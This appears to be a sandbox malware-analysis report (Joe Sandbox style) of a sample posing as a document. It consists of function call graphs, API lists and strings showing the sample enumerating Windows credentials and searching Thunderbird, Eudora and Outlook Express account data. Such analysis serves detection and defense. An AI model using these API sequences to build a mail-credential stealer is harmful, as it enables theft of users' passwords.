409805 strrchr 33385 409814 33384->33385 33386 409817 _mbscat 33384->33386 33385->33386 33386->33324 33399 44b090 33387->33399 33392 40930c 3 API calls 33393 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33392->33393 33394 4097c5 LoadStringA 33393->33394 33395 4097db 33394->33395 33395->33394 33397 4097f3 33395->33397 33406 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33395->33406 33397->33244 33398->33384 33400 40973e _mbscpy _mbscpy 33399->33400 33401 40930c 33400->33401 33402 44b090 33401->33402 33403 409319 memset GetPrivateProfileStringA 33402->33403 33404 409374 33403->33404 33405 409364 WritePrivateProfileStringA 33403->33405 33404->33392 33405->33404 33406->33395 33417 406f81 GetFileAttributesA 33407->33417 33409 409675 33410 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33409->33410 33416 4096ee 33409->33416 33418 409278 GetPrivateProfileStringA 33410->33418 33412 4096c9 33419 409278 GetPrivateProfileStringA 33412->33419 33414 4096da 33420 409278 GetPrivateProfileStringA 33414->33420 33416->33245 33417->33409 33418->33412 33419->33414 33420->33416 33512 409c1c 33421->33512 33424 401e69 memset 33551 410dbb 33424->33551 33427 401ec2 33581 4070e3 strlen _mbscat _mbscpy _mbscat 33427->33581 33428 401ed4 33566 406f81 GetFileAttributesA 33428->33566 33431 401ee6 strlen strlen 33433 401f15 33431->33433 33434 401f28 33431->33434 33582 4070e3 strlen _mbscat _mbscpy _mbscat 33433->33582 33567 406f81 GetFileAttributesA 33434->33567 33437 401f35 33568 401c31 33437->33568 33440 401f75 33580 410a9c RegOpenKeyExA 33440->33580 33441 401c31 7 API calls 33441->33440 33443 401f91 33444 402187 33443->33444 33445 401f9c memset 33443->33445 33447 402195 ExpandEnvironmentStringsA 33444->33447 33448 4021a8 _strcmpi 33444->33448 33583 410b62 RegEnumKeyExA 33445->33583 33592 406f81 GetFileAttributesA 33447->33592 33448->33338 33448->33339 33450 40217e RegCloseKey 33450->33444 33451 401fd9 atoi 33452 401fef memset memset sprintf 33451->33452 33460 401fc9 33451->33460 33584 410b1e 33452->33584 33455 402165 33455->33450 33456 402076 memset memset strlen strlen 33456->33460 33457 4070e3 strlen _mbscat _mbscpy _mbscat 33457->33460 33458 4020dd strlen strlen 33458->33460 33459 406f81 GetFileAttributesA 33459->33460 33460->33450 33460->33451 33460->33455 33460->33456 33460->33457 33460->33458 33460->33459 33461 402167 _mbscpy 33460->33461 33591 410b62 RegEnumKeyExA 33460->33591 33461->33450 33463 40c422 33462->33463 33464 40c425 _mbscat _mbscpy _mbscpy 33462->33464 33463->33464 33465 40c49d 33464->33465 33466 40c512 33465->33466 33467 40c502 GetWindowPlacement 33465->33467 33468 40c538 33466->33468 33613 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33466->33613 33467->33466 33606 409b31 33468->33606 33472 40ba28 33473 40ba87 33472->33473 33479 40ba3c 33472->33479 33616 406c62 LoadCursorA SetCursor 33473->33616 33475 40ba8c 33617 410a9c RegOpenKeyExA 33475->33617 33618 404785 33475->33618 33621 403c16 33475->33621 33697 4107f1 33475->33697 33700 404734 33475->33700 33476 40ba43 _mbsicmp 33476->33479 33477 40baa0 33478 407e30 _strcmpi 33477->33478 33482 40bab0 33478->33482 33479->33473 33479->33476 33708 40b5e5 10 API calls 33479->33708 33480 40bafa SetCursor 33480->33345 33482->33480 33483 40baf1 qsort 33482->33483 33483->33480 34074 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33489->34074 33491 40b00e 33492 40b016 33491->33492 33493 40b01f GetStdHandle 33491->33493 34075 406d1a CreateFileA 33492->34075 33495 40b01c 33493->33495 33496 40b035 33495->33496 33497 40b12d 33495->33497 34076 406c62 LoadCursorA SetCursor 33496->34076 34080 406d77 9 API calls 33497->34080 33500 40b136 33511 40c580 28 API calls 33500->33511 33501 40b087 33508 40b0a1 33501->33508 34078 40a699 12 API calls 33501->34078 33502 40b042 33502->33501 33502->33508 34077 40a57c strlen WriteFile 33502->34077 33505 40b0d6 33506 40b116 CloseHandle 33505->33506 33507 40b11f SetCursor 33505->33507 33506->33507 33507->33500 33508->33505 34079 406d77 9 API calls 33508->34079 33510->33339 33511->33342 33524 409a32 33512->33524 33515 409c80 memcpy memcpy 33516 409cda 33515->33516 33516->33515 33517 409d18 ??2@YAPAXI ??2@YAPAXI 33516->33517 33521 408db6 12 API calls 33516->33521 33519 409d54 ??2@YAPAXI 33517->33519 33520 409d8b 33517->33520 33519->33520 33534 409b9c 33520->33534 33521->33516 33523 4023c1 33523->33424 33525 409a44 33524->33525 33526 409a3d ??3@YAXPAX 33524->33526 33527 409a52 33525->33527 33528 409a4b ??3@YAXPAX 33525->33528 33526->33525 33529 409a63 33527->33529 33530 409a5c ??3@YAXPAX 33527->33530 33528->33527 33531 409a83 ??2@YAPAXI ??2@YAPAXI 33529->33531 33532 409a73 ??3@YAXPAX 33529->33532 33533 409a7c ??3@YAXPAX 33529->33533 33530->33529 33531->33515 33532->33533 33533->33531 33535 407a55 free 33534->33535 33536 409ba5 33535->33536 33537 407a55 free 33536->33537 33538 409bad 33537->33538 33539 407a55 free 33538->33539 33540 409bb5 33539->33540 33541 407a55 free 33540->33541 33542 409bbd 33541->33542 33543 407a1f 4 API calls 33542->33543 33544 409bd0 33543->33544 33545 407a1f 4 API calls 33544->33545 33546 409bda 33545->33546 33547 407a1f 4 API calls 33546->33547 33548 409be4 33547->33548 33549 407a1f 4 API calls 33548->33549 33550 409bee 33549->33550 33550->33523 33552 410d0e 2 API calls 33551->33552 33553 410dca 33552->33553 33554 410dfd memset 33553->33554 33593 4070ae 33553->33593 33555 410e1d 33554->33555 33596 410a9c RegOpenKeyExA 33555->33596 33558 401e9e strlen strlen 33558->33427 33558->33428 33560 410e4a 33561 410e7f _mbscpy 33560->33561 33597 410d3d _mbscpy 33560->33597 33561->33558 33563 410e5b 33598 410add RegQueryValueExA 33563->33598 33565 410e73 RegCloseKey 33565->33561 33566->33431 33567->33437 33599 410a9c RegOpenKeyExA 33568->33599 33570 401c4c 33571 401cad 33570->33571 33600 410add RegQueryValueExA 33570->33600 33571->33440 33571->33441 33573 401c6a 33574 401c71 strchr 33573->33574 33575 401ca4 RegCloseKey 33573->33575 33574->33575 33576 401c85 strchr 33574->33576 33575->33571 33576->33575 33577 401c94 33576->33577 33601 406f06 strlen 33577->33601 33579 401ca1 33579->33575 33580->33443 33581->33428 33582->33434 33583->33460 33604 410a9c RegOpenKeyExA 33584->33604 33586 410b34 33587 410b5d 33586->33587 33605 410add RegQueryValueExA 33586->33605 33587->33460 33589 410b4c RegCloseKey 33589->33587 33591->33460 33592->33448 33594 4070bd GetVersionExA 33593->33594 33595 4070ce 33593->33595 33594->33595 33595->33554 33595->33558 33596->33560 33597->33563 33598->33565 33599->33570 33600->33573 33602 406f17 33601->33602 33603 406f1a memcpy 33601->33603 33602->33603 33603->33579 33604->33586 33605->33589 33607 409b40 33606->33607 33608 409b4e 33606->33608 33614 409901 memset SendMessageA 33607->33614 33610 409b99 33608->33610 33611 409b8b 33608->33611 33610->33472 33615 409868 SendMessageA 33611->33615 33613->33468 33614->33608 33615->33610 33616->33475 33617->33477 33619 4047a3 33618->33619 33620 404799 FreeLibrary 33618->33620 33619->33477 33620->33619 33622 4107f1 FreeLibrary 33621->33622 33623 403c30 LoadLibraryA 33622->33623 33624 403c74 33623->33624 33625 403c44 GetProcAddress 33623->33625 33626 4107f1 FreeLibrary 33624->33626 33625->33624 33627 403c5e 33625->33627 33628 403c7b 33626->33628 33627->33624 33630 403c6b 33627->33630 33629 404734 3 API calls 33628->33629 33631 403c86 33629->33631 33630->33628 33709 4036e5 33631->33709 33634 4036e5 27 API calls 33635 403c9a 33634->33635 33636 4036e5 27 API calls 33635->33636 33637 403ca4 33636->33637 33638 4036e5 27 API calls 33637->33638 33639 403cae 33638->33639 33721 4085d2 33639->33721 33647 403ce5 33648 403cf7 33647->33648 33905 402bd1 40 API calls 33647->33905 33770 410a9c RegOpenKeyExA 33648->33770 33651 403d0a 33652 403d1c 33651->33652 33906 402bd1 40 API calls 33651->33906 33771 402c5d 33652->33771 33656 4070ae GetVersionExA 33657 403d31 33656->33657 33789 410a9c RegOpenKeyExA 33657->33789 33659 403d51 33660 403d61 33659->33660 33907 402b22 47 API calls 33659->33907 33790 410a9c RegOpenKeyExA 33660->33790 33663 403d87 33664 403d97 33663->33664 33908 402b22 47 API calls 33663->33908 33791 410a9c RegOpenKeyExA 33664->33791 33667 403dbd 33668 403dcd 33667->33668 33909 402b22 47 API calls 33667->33909 33792 410808 33668->33792 33672 404785 FreeLibrary 33673 403de8 33672->33673 33796 402fdb 33673->33796 33676 402fdb 34 API calls 33677 403e00 33676->33677 33812 4032b7 33677->33812 33686 403e3b 33688 403e73 33686->33688 33689 403e46 _mbscpy 33686->33689 33859 40fb00 33688->33859 33911 40f334 334 API calls 33689->33911 33698 410807 33697->33698 33699 4107fc FreeLibrary 33697->33699 33698->33477 33699->33698 33701 404785 FreeLibrary 33700->33701 33702 40473b LoadLibraryA 33701->33702 33703 40474c GetProcAddress 33702->33703 33704 40476e 33702->33704 33703->33704 33705 404764 33703->33705 33706 404781 33704->33706 33707 404785 FreeLibrary 33704->33707 33705->33704 33706->33477 33707->33706 33708->33479 33710 4036fb 33709->33710 33713 4037c5 33709->33713 33912 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33710->33912 33712 40370e 33712->33713 33714 403716 strchr 33712->33714 33713->33634 33714->33713 33715 403730 33714->33715 33913 4021b6 memset 33715->33913 33717 40373f _mbscpy _mbscpy strlen 33718 4037a4 _mbscpy 33717->33718 33719 403789 sprintf 33717->33719 33914 4023e5 16 API calls 33718->33914 33719->33718 33722 4085e2 33721->33722 33915 4082cd 11 API calls 33722->33915 33726 408600 33727 403cba 33726->33727 33728 40860b memset 33726->33728 33739 40821d 33727->33739 33918 410b62 RegEnumKeyExA 33728->33918 33730 408637 33731 4086d2 RegCloseKey 33730->33731 33733 40865c memset 33730->33733 33919 410a9c RegOpenKeyExA 33730->33919 33922 410b62 RegEnumKeyExA 33730->33922 33731->33727 33920 410add RegQueryValueExA 33733->33920 33736 408694 33921 40848b 10 API calls 33736->33921 33738 4086ab RegCloseKey 33738->33730 33923 410a9c RegOpenKeyExA 33739->33923 33741 40823f 33742 403cc6 33741->33742 33743 408246 memset 33741->33743 33751 4086e0 33742->33751 33924 410b62 RegEnumKeyExA 33743->33924 33745 4082bf RegCloseKey 33745->33742 33747 40826f 33747->33745 33925 410a9c RegOpenKeyExA 33747->33925 33926 4080ed 11 API calls 33747->33926 33927 410b62 RegEnumKeyExA 33747->33927 33750 4082a2 RegCloseKey 33750->33747 33928 4045db 33751->33928 33754 4088f7 33936 404656 33754->33936 33756 40872d 33756->33754 33758 408737 wcslen 33756->33758 33760 4088ef LocalFree 33758->33760 33766 40876a 33758->33766 33759 40872b CredEnumerateW 33759->33756 33760->33754 33761 40877a wcsncmp 33761->33766 33763 404734 3 API calls 33763->33766 33764 404785 FreeLibrary 33764->33766 33765 408812 memset 33765->33766 33767 40883c memcpy wcschr 33765->33767 33766->33760 33766->33761 33766->33763 33766->33764 33766->33765 33766->33767 33768 4088c3 LocalFree 33766->33768 33939 40466b _mbscpy 33766->33939 33767->33766 33768->33766 33769 410a9c RegOpenKeyExA 33769->33647 33770->33651 33940 410a9c RegOpenKeyExA 33771->33940 33773 402c7a 33774 402da5 33773->33774 33775 402c87 memset 33773->33775 33774->33656 33941 410b62 RegEnumKeyExA 33775->33941 33777 402d9c RegCloseKey 33777->33774 33778 410b1e 3 API calls 33779 402ce4 memset sprintf 33778->33779 33942 410a9c RegOpenKeyExA 33779->33942 33781 402d28 33782 402d3a sprintf 33781->33782 33943 402bd1 40 API calls 33781->33943 33944 410a9c RegOpenKeyExA 33782->33944 33785 402cb2 33785->33777 33785->33778 33788 402d9a 33785->33788 33945 402bd1 40 API calls 33785->33945 33946 410b62 RegEnumKeyExA 33785->33946 33788->33777 33789->33659 33790->33663 33791->33667 33793 410816 33792->33793 33794 4107f1 FreeLibrary 33793->33794 33795 403ddd 33794->33795 33795->33672 33947 410a9c RegOpenKeyExA 33796->33947 33798 402ff9 33799 403006 memset 33798->33799 33800 40312c 33798->33800 33948 410b62 RegEnumKeyExA 33799->33948 33800->33676 33802 403122 RegCloseKey 33802->33800 33803 410b1e 3 API calls 33804 403058 memset sprintf 33803->33804 33949 410a9c RegOpenKeyExA 33804->33949 33806 403033 33806->33802 33806->33803 33807 4030a2 memset 33806->33807 33808 410b62 RegEnumKeyExA 33806->33808 33810 4030f9 RegCloseKey 33806->33810 33951 402db3 26 API calls 33806->33951 33950 410b62 RegEnumKeyExA 33807->33950 33808->33806 33810->33806 33813 4032d5 33812->33813 33814 4033a9 33812->33814 33952 4021b6 memset 33813->33952 33827 4034e4 memset memset 33814->33827 33816 4032e1 33953 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33816->33953 33818 4032ea 33819 4032f8 memset GetPrivateProfileSectionA 33818->33819 33954 4023e5 16 API calls 33818->33954 33819->33814 33824 40332f 33819->33824 33821 40339b strlen 33821->33814 33821->33824 33823 403350 strchr 33823->33824 33824->33814 33824->33821 33955 4021b6 memset 33824->33955 33956 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33824->33956 33957 4023e5 16 API calls 33824->33957 33828 410b1e 3 API calls 33827->33828 33829 40353f 33828->33829 33830 40357f 33829->33830 33831 403546 _mbscpy 33829->33831 33835 403985 33830->33835 33958 406d55 strlen _mbscat 33831->33958 33833 403565 _mbscat 33959 4033f0 19 API calls 33833->33959 33960 40466b _mbscpy 33835->33960 33839 4039aa 33841 4039ff 33839->33841 33961 40f460 memset memset 33839->33961 33982 40f6e2 33839->33982 34000 4038e8 21 API calls 33839->34000 33842 404785 FreeLibrary 33841->33842 33843 403a0b 33842->33843 33844 4037ca memset memset 33843->33844 34008 444551 memset 33844->34008 33847 4038e2 33847->33686 33910 40f334 334 API calls 33847->33910 33849 40382e 33850 406f06 2 API calls 33849->33850 33851 403843 33850->33851 33852 406f06 2 API calls 33851->33852 33853 403855 strchr 33852->33853 33854 403884 _mbscpy 33853->33854 33855 403897 strlen 33853->33855 33856 4038bf _mbscpy 33854->33856 33855->33856 33857 4038a4 sprintf 33855->33857 34020 4023e5 16 API calls 33856->34020 33857->33856 33860 44b090 33859->33860 33861 40fb10 RegOpenKeyExA 33860->33861 33862 403e7f 33861->33862 33863 40fb3b RegOpenKeyExA 33861->33863 33873 40f96c 33862->33873 33864 40fb55 RegQueryValueExA 33863->33864 33865 40fc2d RegCloseKey 33863->33865 33866 40fc23 RegCloseKey 33864->33866 33867 40fb84 33864->33867 33865->33862 33866->33865 33868 404734 3 API calls 33867->33868 33869 40fb91 33868->33869 33869->33866 33870 40fc19 LocalFree 33869->33870 33871 40fbdd memcpy memcpy 33869->33871 33870->33866 34025 40f802 11 API calls 33871->34025 33874 4070ae GetVersionExA 33873->33874 33875 40f98d 33874->33875 33876 4045db 7 API calls 33875->33876 33880 40f9a9 33876->33880 33877 40fae6 33878 404656 FreeLibrary 33877->33878 33879 403e85 33878->33879 33885 4442ea memset 33879->33885 33880->33877 33881 40fa13 memset WideCharToMultiByte 33880->33881 33881->33880 33882 40fa43 _strnicmp 33881->33882 33882->33880 33883 40fa5b WideCharToMultiByte 33882->33883 33883->33880 33884 40fa88 WideCharToMultiByte 33883->33884 33884->33880 33886 410dbb 9 API calls 33885->33886 33887 444329 33886->33887 34026 40759e strlen strlen 33887->34026 33892 410dbb 9 API calls 33893 444350 33892->33893 33894 40759e 3 API calls 33893->33894 33895 44435a 33894->33895 33896 444212 65 API calls 33895->33896 33897 444366 memset memset 33896->33897 33898 410b1e 3 API calls 33897->33898 33899 4443b9 ExpandEnvironmentStringsA strlen 33898->33899 33900 4443f4 _strcmpi 33899->33900 33901 4443e5 33899->33901 33902 403e91 33900->33902 33903 44440c 33900->33903 33901->33900 33902->33477 33904 444212 65 API calls 33903->33904 33904->33902 33905->33648 33906->33652 33907->33660 33908->33664 33909->33668 33910->33686 33911->33688 33912->33712 33913->33717 33914->33713 33916 40841c 33915->33916 33917 410a9c RegOpenKeyExA 33916->33917 33917->33726 33918->33730 33919->33730 33920->33736 33921->33738 33922->33730 33923->33741 33924->33747 33925->33747 33926->33750 33927->33747 33929 404656 FreeLibrary 33928->33929 33930 4045e3 LoadLibraryA 33929->33930 33931 404651 33930->33931 33932 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33930->33932 33931->33754 33931->33756 33931->33759 33933 40463d 33932->33933 33934 404643 33933->33934 33935 404656 FreeLibrary 33933->33935 33934->33931 33935->33931 33937 403cd2 33936->33937 33938 40465c FreeLibrary 33936->33938 33937->33769 33938->33937 33939->33766 33940->33773 33941->33785 33942->33781 33943->33782 33944->33785 33945->33785 33946->33785 33947->33798 33948->33806 33949->33806 33950->33806 33951->33806 33952->33816 33953->33818 33954->33819 33955->33823 33956->33824 33957->33824 33958->33833 33959->33830 33960->33839 34001 4078ba 33961->34001 33964 4078ba _mbsnbcat 33965 40f5a3 RegOpenKeyExA 33964->33965 33966 40f5c3 RegQueryValueExA 33965->33966 33967 40f6d9 33965->33967 33968 40f6d0 RegCloseKey 33966->33968 33969 40f5f0 33966->33969 33967->33839 33968->33967 33969->33968 33970 40f675 33969->33970 34005 40466b _mbscpy 33969->34005 33970->33968 34006 4012ee strlen 33970->34006 33972 40f611 33974 404734 3 API calls 33972->33974 33979 40f616 33974->33979 33975 40f69e RegQueryValueExA 33975->33968 33976 40f6c1 33975->33976 33976->33968 33977 40f66a 33978 404785 FreeLibrary 33977->33978 33978->33970 33979->33977 33980 40f661 LocalFree 33979->33980 33981 40f645 memcpy 33979->33981 33980->33977 33981->33980 34007 40466b _mbscpy 33982->34007 33984 40f6fa 33985 4045db 7 API calls 33984->33985 33986 40f708 33985->33986 33987 40f7e2 33986->33987 33988 404734 3 API calls 33986->33988 33989 404656 FreeLibrary 33987->33989 33990 40f715 33988->33990 33991 40f7f1 33989->33991 33990->33987 33992 40f71d CredReadA 33990->33992 33993 404785 FreeLibrary 33991->33993 33992->33987 33995 40f734 33992->33995 33994 40f7fc 33993->33994 33994->33839 33995->33987 33995->33995 33996 40f797 WideCharToMultiByte 33995->33996 33997 40f7b8 strlen 33996->33997 33998 40f7d9 LocalFree 33996->33998 33997->33998 33999 40f7c8 _mbscpy 33997->33999 33998->33987 33999->33998 34000->33839 34002 4078e6 34001->34002 34003 4078c7 _mbsnbcat 34002->34003 34004 4078ea 34002->34004 34003->34002 34004->33964 34005->33972 34006->33975 34007->33984 34021 410a9c RegOpenKeyExA 34008->34021 34010 44458b 34011 40381a 34010->34011 34022 410add RegQueryValueExA 34010->34022 34011->33847 34019 4021b6 memset 34011->34019 34013 4445dc RegCloseKey 34013->34011 34014 4445a4 34014->34013 34023 410add RegQueryValueExA 34014->34023 34016 4445c1 34016->34013 34024 444879 30 API calls 34016->34024 34018 4445da 34018->34013 34019->33849 34020->33847 34021->34010 34022->34014 34023->34016 34024->34018 34025->33870 34027 4075c9 34026->34027 34028 4075bb _mbscat 34026->34028 34029 444212 34027->34029 34028->34027 34046 407e9d 34029->34046 34032 44424d 34033 444274 34032->34033 34034 444258 34032->34034 34054 407ef8 34032->34054 34035 407e9d 9 API calls 34033->34035 34071 444196 52 API calls 34034->34071 34042 4442a0 34035->34042 34037 407ef8 9 API calls 34037->34042 34038 4442ce 34068 407f90 34038->34068 34042->34037 34042->34038 34044 444212 65 API calls 34042->34044 34064 407e62 34042->34064 34043 407f90 FindClose 34045 4442e4 34043->34045 34044->34042 34045->33892 34047 407f90 FindClose 34046->34047 34048 407eaa 34047->34048 34049 406f06 2 API calls 34048->34049 34050 407ebd strlen strlen 34049->34050 34051 407ee1 34050->34051 34052 407eea 34050->34052 34072 4070e3 strlen _mbscat _mbscpy _mbscat 34051->34072 34052->34032 34055 407f03 FindFirstFileA 34054->34055 34056 407f24 FindNextFileA 34054->34056 34057 407f3f 34055->34057 34058 407f46 strlen strlen 34056->34058 34059 407f3a 34056->34059 34057->34058 34061 407f7f 34057->34061 34058->34061 34062 407f76 34058->34062 34060 407f90 FindClose 34059->34060 34060->34057 34061->34032 34073 4070e3 strlen _mbscat _mbscpy _mbscat 34062->34073 34065 407e94 34064->34065 34066 407e6c strcmp 34064->34066 34065->34042 34066->34065 34067 407e83 strcmp 34066->34067 34067->34065 34069 407fa3 34068->34069 34070 407f99 FindClose 34068->34070 34069->34043 34070->34069 34071->34032 34072->34052 34073->34061 34074->33491 34075->33495 34076->33502 34077->33501 34078->33508 34079->33505 34080->33500 34425 43ffc8 18 API calls 34239 4281cc 15 API calls 34427 4383cc 110 API calls 34240 4275d3 41 API calls 34428 4153d3 22 API calls 34241 444dd7 _XcptFilter 34433 4013de 15 API calls 34435 425115 111 API calls 34436 43f7db 18 API calls 34439 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34243 4335ee 16 API calls 34441 429fef 11 API calls 34244 444deb _exit _c_exit 34442 40bbf0 138 API calls 34247 425115 79 API calls 34446 437ffa 22 API calls 34251 4021ff 14 API calls 34252 43f5fc 149 API calls 34447 40e381 9 API calls 34254 405983 40 API calls 34255 42b186 27 API calls 34256 427d86 76 API calls 34257 403585 20 API calls 34259 42e58e 18 API calls 34262 425115 75 API calls 34264 401592 8 API calls 33158 410b92 33161 410a6b 33158->33161 33160 410bb2 33162 410a77 33161->33162 33163 410a89 GetPrivateProfileIntA 33161->33163 33166 410983 memset _itoa WritePrivateProfileStringA 33162->33166 33163->33160 33165 410a84 33165->33160 33166->33165 34451 434395 16 API calls 34266 441d9c memcmp 34453 43f79b 119 API calls 34267 40c599 43 API calls 34454 426741 87 API calls 34271 4401a6 21 API calls 34273 426da6 memcpy memset memset memcpy 34274 4335a5 15 API calls 34276 4299ab memset memset memcpy memset memset 34277 40b1ab 8 API calls 34459 425115 76 API calls 34463 4113b2 18 API calls 34467 40a3b8 memset sprintf SendMessageA 34081 410bbc 34084 4109cf 34081->34084 34085 4109dc 34084->34085 34086 410a23 memset GetPrivateProfileStringA 34085->34086 34087 4109ea memset 34085->34087 34092 407646 strlen 34086->34092 34097 4075cd sprintf memcpy 34087->34097 34090 410a65 34091 410a0c WritePrivateProfileStringA 34091->34090 34093 40765a 34092->34093 34094 40765c 34092->34094 34093->34090 34096 4076a3 34094->34096 34098 40737c strtoul 34094->34098 34096->34090 34097->34091 34098->34094 34279 40b5bf memset memset _mbsicmp

                                                            Executed Functions

                                                            Function 004082CD Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 145stringCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                            APIs
                                                            • memset.MSVCRT ref: 0040832F
                                                            • memset.MSVCRT ref: 00408343
                                                            • memset.MSVCRT ref: 0040835F
                                                            • memset.MSVCRT ref: 00408376
                                                            • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                            • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                            • strlen.MSVCRT ref: 004083E9
                                                            • strlen.MSVCRT ref: 004083F8
                                                            • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                            • String ID: 5$H$O$b$i$}$}
                                                            • API String ID: 1832431107-3760989150
                                                            • Opcode ID: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                            • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                            • Opcode Fuzzy Hash: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                            • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                            Function 00407EF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                            • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                            • strlen.MSVCRT ref: 00407F5C
                                                            • strlen.MSVCRT ref: 00407F64
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FileFindstrlen$FirstNext
                                                            • String ID: ACD
                                                            • API String ID: 379999529-620537770
                                                            • Opcode ID: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                            • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                            • Opcode Fuzzy Hash: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                            • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                                                            Function 00401E69 Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • memset.MSVCRT ref: 00401E8B
                                                            • strlen.MSVCRT ref: 00401EA4
                                                            • strlen.MSVCRT ref: 00401EB2
                                                            • strlen.MSVCRT ref: 00401EF8
                                                            • strlen.MSVCRT ref: 00401F06
                                                            • memset.MSVCRT ref: 00401FB1
                                                            • atoi.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401FE0
                                                            • memset.MSVCRT ref: 00402003
                                                            • sprintf.MSVCRT ref: 00402030
                                                              • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                            • memset.MSVCRT ref: 00402086
                                                            • memset.MSVCRT ref: 0040209B
                                                            • strlen.MSVCRT ref: 004020A1
                                                            • strlen.MSVCRT ref: 004020AF
                                                            • strlen.MSVCRT ref: 004020E2
                                                            • strlen.MSVCRT ref: 004020F0
                                                            • memset.MSVCRT ref: 00402018
                                                              • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                              • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                            • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                            • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402181
                                                            • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040219C
                                                              • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                            • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                            • API String ID: 1846531875-4223776976
                                                            • Opcode ID: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
